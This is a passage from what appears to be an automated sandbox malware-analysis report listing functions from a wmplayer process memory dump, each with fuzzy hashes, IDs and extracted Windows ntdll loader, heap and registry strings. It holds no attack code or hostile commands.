                                              • Instruction Fuzzy Hash: AAA179759212299BDB21DF24CCC8BAEB7B8EF44710F1441E9E909AB250D735AEC4CF50
                                              Function 033636EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                              • API String ID: 0-318774311
                                              • Opcode ID: 2dcaec5d84021c011e27c7e5fada7228a49fa4d3971b98fa4bbcede329c18339
                                              • Instruction ID: 0f7cb21f5b52393d7f08037783f4f17c45dd5e2a3dd26672870d644b6a264a4a
                                              • Opcode Fuzzy Hash: 2dcaec5d84021c011e27c7e5fada7228a49fa4d3971b98fa4bbcede329c18339
                                              • Instruction Fuzzy Hash: D9818879608340AFE311DB14C884B6AB7E8EF85760F08896DF9919B3A4D774E944CB62
                                              Function 0330909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$&$@
                                              • API String ID: 0-1537733988
                                              • Opcode ID: 1c44cf4ac9d933b4e373e667e192f257926214363335671daf609548d64ea5e1
                                              • Instruction ID: b992b8778cb7e6b88e1c9b52bab97c1be3ea3a7f2c06c49d59d51c56ff823b83
                                              • Opcode Fuzzy Hash: 1c44cf4ac9d933b4e373e667e192f257926214363335671daf609548d64ea5e1
                                              • Instruction Fuzzy Hash: 0471AF74A083059FD714DF24C9E0B2BFBE9BF85618F14891DE4968B6A2C730E905CB92
                                              Function 033AB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                              Download Yara Rule
                                              Strings
                                              • TargetNtPath, xrefs: 033AB82F
                                              • GlobalizationUserSettings, xrefs: 033AB834
                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 033AB82A
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                              • API String ID: 0-505981995
                                              • Opcode ID: 6fb7b61f687b66ed8ff62d1a399c6e885dcd16aafcbf23f11346570e84f4994e
                                              • Instruction ID: 63097017e61b4ac1c2c805eadb79484370765737142e628ad64be1f66853ac62
                                              • Opcode Fuzzy Hash: 6fb7b61f687b66ed8ff62d1a399c6e885dcd16aafcbf23f11346570e84f4994e
                                              • Instruction Fuzzy Hash: 53616E72951A29AFDB21DB58DC88B9AF7B8EF04710F0501E9A509AB250DB74DE80CF90
                                              Function 032CF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                              Download Yara Rule
                                              Strings
                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0332E6C6
                                              • HEAP: , xrefs: 0332E6B3
                                              • HEAP[%wZ]: , xrefs: 0332E6A6
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                              • API String ID: 0-1340214556
                                              • Opcode ID: af55821329f0b7308e0fb8cc901bd52498652268791b3d76f14d8ddef0374fb4
                                              • Instruction ID: 767b5e488cdc00bde248c18750fc489f0062c704f4afd23cba2c84b92246aa8f
                                              • Opcode Fuzzy Hash: af55821329f0b7308e0fb8cc901bd52498652268791b3d76f14d8ddef0374fb4
                                              • Instruction Fuzzy Hash: A6511635630784EFD712DBA8D985F6ABBF9FF05300F0802A9E5458B692D3B4E990CB10
                                              Function 0330C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                              Download Yara Rule
                                              Strings
                                              • minkernel\ntdll\ldrinit.c, xrefs: 033482E8
                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 033482DE
                                              • Failed to reallocate the system dirs string !, xrefs: 033482D7
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-1783798831
                                              • Opcode ID: 7009fcfa9e0e1d2a3d035529cde01baf81811219600ccf282e9a1d80fd6e1365
                                              • Instruction ID: 276f69cb98d8eb45d474c08d58d0793257f74107fc57531845d9351f3ecd4bdd
                                              • Opcode Fuzzy Hash: 7009fcfa9e0e1d2a3d035529cde01baf81811219600ccf282e9a1d80fd6e1365
                                              • Instruction Fuzzy Hash: 3941C1B5564304AFC720FB24DCC5B5BB7ECAF44B50F084A2AB945DB290EBB0E840CB95
                                              Function 0338C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                              Download Yara Rule
                                              Strings
                                              • @, xrefs: 0338C1F1
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0338C1C5
                                              • PreferredUILanguages, xrefs: 0338C212
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                              • API String ID: 0-2968386058
                                              • Opcode ID: 6839f7c5439b87ebfe8fe75adec487f5839bb09b8f76e5dabde7deab459785b9
                                              • Instruction ID: 1fe1ed7c83ee229339f2c507c5c9967ebd4100cd49f701657727bf0e4621f9d1
                                              • Opcode Fuzzy Hash: 6839f7c5439b87ebfe8fe75adec487f5839bb09b8f76e5dabde7deab459785b9
                                              • Instruction Fuzzy Hash: 0C415C76E10319EBDF15EBD4C881FEEF7BCAB14700F14416AEA05A7290D7B49A448BA0
                                              Function 03364144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                              • API String ID: 0-1373925480
                                              • Opcode ID: b159d21392405f1533762d3ecb570aeaef14269fb26365a333185b196f126a35
                                              • Instruction ID: 5a24d3e8bd1297fb9d36a1a84c780acc7d99a026174ecc8814a504a48aace603
                                              • Opcode Fuzzy Hash: b159d21392405f1533762d3ecb570aeaef14269fb26365a333185b196f126a35
                                              • Instruction Fuzzy Hash: 0941ED35D007588FEB21DBE6C880BADBBB8FF45340F28449AD902EFB95DA749941CB11
                                              Function 03354755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                              Download Yara Rule
                                              Strings
                                              • LdrpCheckRedirection, xrefs: 0335488F
                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03354899
                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03354888
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                              • API String ID: 0-3154609507
                                              • Opcode ID: 03b10a78e6a1c818332fe85b19e4c2796cb07f32210f17d1b7e4d424f5d0f447
                                              • Instruction ID: b2092893c93fdfd51f92903a2e47df3dc7883dd4858ccae08a5275570092f8bd
                                              • Opcode Fuzzy Hash: 03b10a78e6a1c818332fe85b19e4c2796cb07f32210f17d1b7e4d424f5d0f447
                                              • Instruction Fuzzy Hash: 4A41E432A107509FCB29CE5ADCC0E26BBE8AF49750F0A0559FC59DB311D331E880CB81
                                              Function 033033A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              • SXS: %s() passed the empty activation context data, xrefs: 033429FE
                                              • Actx , xrefs: 033033AC
                                              • RtlCreateActivationContext, xrefs: 033429F9
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                              • API String ID: 0-859632880
                                              • Opcode ID: 183b7834a4a8b95195777d275643154eb58bafee2002e1ad80cc7e9bc64bc185
                                              • Instruction ID: 311d53042a8c9ea737153107b2ea9ed741fd1b064651269129ac02e3a863d5eb
                                              • Opcode Fuzzy Hash: 183b7834a4a8b95195777d275643154eb58bafee2002e1ad80cc7e9bc64bc185
                                              • Instruction Fuzzy Hash: 2E3103366103059FDB26DF58CCD1BA6B7A8AB44720F194869FD05EF285CB70E891C7A0
                                              Function 03301607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                              Download Yara Rule
                                              Strings
                                              • DLL "%wZ" has TLS information at %p, xrefs: 03341A40
                                              • minkernel\ntdll\ldrtls.c, xrefs: 03341A51
                                              • LdrpInitializeTls, xrefs: 03341A47
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-931879808
                                              • Opcode ID: 36cad9333c350593d2827536c0f46175fd85a39e45d5b1e57824dbf6c58fd212
                                              • Instruction ID: 6111bc52654c20483909144fc06b63fee06fdddc36bf81112720e711fdea7fe6
                                              • Opcode Fuzzy Hash: 36cad9333c350593d2827536c0f46175fd85a39e45d5b1e57824dbf6c58fd212
                                              • Instruction Fuzzy Hash: 9131F63AE20708ABE710EB45CCE5FAE72BCFB45754F084159E905AB5D0D770BD448790
                                              Function 03311270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                              Download Yara Rule
                                              Strings
                                              • BuildLabEx, xrefs: 0331130F
                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0331127B
                                              • @, xrefs: 033112A5
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 0-3051831665
                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                              • Instruction ID: d7512d1fe83ef9ae7a57362ce882d5dfb53f4bf018cfbc8d404306d41b73d2f5
                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                              • Instruction Fuzzy Hash: AD318F76D00618ABDF15EF95CC84EEFBBBDEB84750F004825EA14AB5A0D730DA159B90
                                              Function 033520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                              Download Yara Rule
                                              Strings
                                              • LdrpInitializationFailure, xrefs: 033520FA
                                              • Process initialization failed with status 0x%08lx, xrefs: 033520F3
                                              • minkernel\ntdll\ldrinit.c, xrefs: 03352104
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-2986994758
                                              • Opcode ID: dea6aa41eb2fc21b12e18b2280a90dc246a82b3ea1e2da9d4114523b169d8ef3
                                              • Instruction ID: 35cfce6268243d7792011317ca92cb5926a70ef1ee694184cb22de353bbdbc0e
                                              • Opcode Fuzzy Hash: dea6aa41eb2fc21b12e18b2280a90dc246a82b3ea1e2da9d4114523b169d8ef3
                                              • Instruction Fuzzy Hash: 43F0C879A50348BFD714E64DDC86FDA776CEB40B54F140455FA00AB685D2B0F640CA51
                                              Function 032E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: #%u
                                              • API String ID: 48624451-232158463
                                              • Opcode ID: 547b868ce159a1a1bb1d0f558c75f2a83f03d4dcaeaa5413886c23cd6384e10d
                                              • Instruction ID: 5e9cff143eb0d51304cffc635c9d912e4409c668c4387a18c453cf6661c6e789
                                              • Opcode Fuzzy Hash: 547b868ce159a1a1bb1d0f558c75f2a83f03d4dcaeaa5413886c23cd6384e10d
                                              • Instruction Fuzzy Hash: A3716A76A1020A9FDB05DFA9C991FAEB7F8FF08704F144065E905EB251EA78ED41CB60
                                              Function 032E52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@
                                              • API String ID: 0-149943524
                                              • Opcode ID: 2a076d0358dd90382ad2a19605f4420a8baacfb9af7f18b4258ef7f7fd03e7d2
                                              • Instruction ID: f52db55e57a254b4fd4f4f3bb88cc46777a4cf2cf9706b64d54edc233c883b8b
                                              • Opcode Fuzzy Hash: 2a076d0358dd90382ad2a19605f4420a8baacfb9af7f18b4258ef7f7fd03e7d2
                                              • Instruction Fuzzy Hash: C7329D745283129FC724CF18C48277EF7E5AF86748FA8891EF9859B290E774D884CB52
                                              Function 0339A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `$`
                                              • API String ID: 0-197956300
                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                              • Instruction ID: 09afd782b11fb8e9c9325e5c8431ffb0cbbe84daca2fff4711fab13c61763adf
                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                              • Instruction Fuzzy Hash: A2C1AD31204342DBEB24CF28CC81B6BFBE5AFC4718F184A2EF9958A290D775D945CB91
                                              Function 0334E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Legacy$UEFI
                                              • API String ID: 2994545307-634100481
                                              • Opcode ID: b65501f60686803000c29506cbeb9dc3ab37c558ad45ea9c6f9a98b4976bb69d
                                              • Instruction ID: 2e58a7878452a976fac64cf5490138edb3e683b08d311dd125b211b0a2cba5ba
                                              • Opcode Fuzzy Hash: b65501f60686803000c29506cbeb9dc3ab37c558ad45ea9c6f9a98b4976bb69d
                                              • Instruction Fuzzy Hash: B4615C76E103189FDB14DFA8C980BAEBBF9FB44740F14406DE559EB291D731A940CB90
                                              Function 032EF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$$
                                              • API String ID: 0-233714265
                                              • Opcode ID: 589ab4cbb0d9cbb325d5d65918a3afc23084ccf1036575840350e46806376d91
                                              • Instruction ID: 72c592cfbce176c2261ef53dd6005db910016352ad55464f3dbdd51d54f18bcb
                                              • Opcode Fuzzy Hash: 589ab4cbb0d9cbb325d5d65918a3afc23084ccf1036575840350e46806376d91
                                              • Instruction Fuzzy Hash: D161E075A2074AEFDB20DFA4D682BACF7B5FF04704F894069D5156F280CBB4A980CB80
                                              Function 032DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                              Download Yara Rule
                                              Strings
                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 032DA309
                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 032DA2FB
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                              • API String ID: 0-2876891731
                                              • Opcode ID: 4e90a366ddcc955013513a3a8a2fe4b0bca9c117ea16e86da4cbe0bb5dbc8d94
                                              • Instruction ID: a2a420c46ddba4feb628d827d6ac38ef8b5c4c46b9ec953a05f1a3c2bd6f2a7e
                                              • Opcode Fuzzy Hash: 4e90a366ddcc955013513a3a8a2fe4b0bca9c117ea16e86da4cbe0bb5dbc8d94
                                              • Instruction Fuzzy Hash: 28419E35A24649DBCB15CF59C880F6EB7B5FF86700F2884A9EC05DB6A1E375D980CB50
                                              Function 0330329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .Local\$@
                                              • API String ID: 0-380025441
                                              • Opcode ID: 5d37ebde1a44c7d932bc20ef12bc74ad28710534353093664cbb5f2a8b81472a
                                              • Instruction ID: a5e9a623d925ec741878a246e99ec38b56d639df8ef023d98b8db72037234860
                                              • Opcode Fuzzy Hash: 5d37ebde1a44c7d932bc20ef12bc74ad28710534353093664cbb5f2a8b81472a
                                              • Instruction Fuzzy Hash: F431B37A509304AFC711DF28C8D0A5BBBECFF85664F48096EF59587290DA30DD04CB92
                                              Function 032DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: MUI
                                              • API String ID: 0-1339004836
                                              • Opcode ID: d15ea5b2f84bce1ae47a65b8e30839cb59221385024831b3f16a22c07e072b7b
                                              • Instruction ID: 9608be14ad7a2c1d862ae5c3bf73523902c9fc3ee3babf8a1d6454c615138f2c
                                              • Opcode Fuzzy Hash: d15ea5b2f84bce1ae47a65b8e30839cb59221385024831b3f16a22c07e072b7b
                                              • Instruction Fuzzy Hash: 3B826C75E206298FDB24CFA9C880BEDF7B5BF48710F18816AD859AB394D7709981CF50
                                              Function 032D7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4e18e9557e5945416c0c7544c9cf54376fd1d59f539f12e85d3e66427a5061e
                                              • Instruction ID: 663ce833664df7b9a82196b330093b0ca78d7d9b9c92a3fa2ce290d894a8872e
                                              • Opcode Fuzzy Hash: b4e18e9557e5945416c0c7544c9cf54376fd1d59f539f12e85d3e66427a5061e
                                              • Instruction Fuzzy Hash: B4A16D75A18742CFC715DF28C480A2ABBF9FF88304F14496EE5859B350E774E985CB92
                                              Function 0330F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d6a0900444f85a589fd05f66223630fb3469c0718a23d088d93ac305343c02c
                                              • Instruction ID: 6b8b7496c1098bc324cf94bbf780c1e292c094da074ada9f4db58e6732dee15c
                                              • Opcode Fuzzy Hash: 5d6a0900444f85a589fd05f66223630fb3469c0718a23d088d93ac305343c02c
                                              • Instruction Fuzzy Hash: 41413A79D10388AFCB20DFA9C8D1AAEFBB8FB48340F54816ED455A7251D730A940CF60
                                              Function 0330A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalTags
                                              • API String ID: 0-1106856819
                                              • Opcode ID: 50390a5288599fc5bf03f3b46810bfd971deb7d8af975a4e88639e70d5e66bd0
                                              • Instruction ID: 6274a680f41e86beafcc0a25c0145d486dc6a4f4eafb27bf814fbb4ce210b802
                                              • Opcode Fuzzy Hash: 50390a5288599fc5bf03f3b46810bfd971deb7d8af975a4e88639e70d5e66bd0
                                              • Instruction Fuzzy Hash: BD718D75E0030ADFDF28CF98D9D26ADBBF5BF49710F18816AE805AB240E771A941CB50
                                              Function 032D973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                              • Instruction ID: 3c096023d8c9b0af49849fa9495262623b25453e98a365f9f236ee94d5401d3d
                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                              • Instruction Fuzzy Hash: A6616B75D11219AFDF21DF99D880BAEFBB4FF85B10F144569E810EB290D7709A80CB60
                                              Function 0335F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                              • Instruction ID: 226041a8b4bd9fb9e0a6c9b04896033be5e0df4b02f965dae1df8acd55162d37
                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                              • Instruction Fuzzy Hash: AA517776614745EFEB21DF54CC80F6BB7E8FB84754F080929BA809B290D7B4E914CB92
                                              Function 032EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: EXT-
                                              • API String ID: 0-1948896318
                                              • Opcode ID: 1ff26270e297a78ea9d55410a307f2f368177a2d15977fc6411321ebddbe9538
                                              • Instruction ID: 9c802c07ef11c5b6293c17fc007a73d9dd3aa59aaa4a833f8b94b7097cf16321
                                              • Opcode Fuzzy Hash: 1ff26270e297a78ea9d55410a307f2f368177a2d15977fc6411321ebddbe9538
                                              • Instruction Fuzzy Hash: 5641F3765283129BD710DB74D882B6FB7E8AF88704F860A2DF584EB140E7B4D984C797
                                              Function 0338B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PreferredUILanguages
                                              • API String ID: 0-1884656846
                                              • Opcode ID: 00cfd934d5db357641dc7392fc7a9fa015c95c45495c42653a625dbf22af2fba
                                              • Instruction ID: 7459fb986b91a2671cf5a6055804d230f669da88a32ff43525cfbebd587158bc
                                              • Opcode Fuzzy Hash: 00cfd934d5db357641dc7392fc7a9fa015c95c45495c42653a625dbf22af2fba
                                              • Instruction Fuzzy Hash: 4141A136D1031AABDF11EB94CC80AEEF7BDAF45750F19016AE911AB250D6F0DE40C7A0
                                              Function 0334C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryHash
                                              • API String ID: 0-2202222882
                                              • Opcode ID: 1652b9f2b30334e98d9cebc2eccac002d039c7555b351d4e28ea2a3ddffb36f4
                                              • Instruction ID: 0826118edf55420ce01a484400d86542859cff98a7616dcbedeb1bfe3141f902
                                              • Opcode Fuzzy Hash: 1652b9f2b30334e98d9cebc2eccac002d039c7555b351d4e28ea2a3ddffb36f4
                                              • Instruction Fuzzy Hash: 2D4100B5D0162CAADB21DB50CCC5FDEB7BCAB45714F0045A5AA08AB150DB70AE89CFA4
                                              Function 033597A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
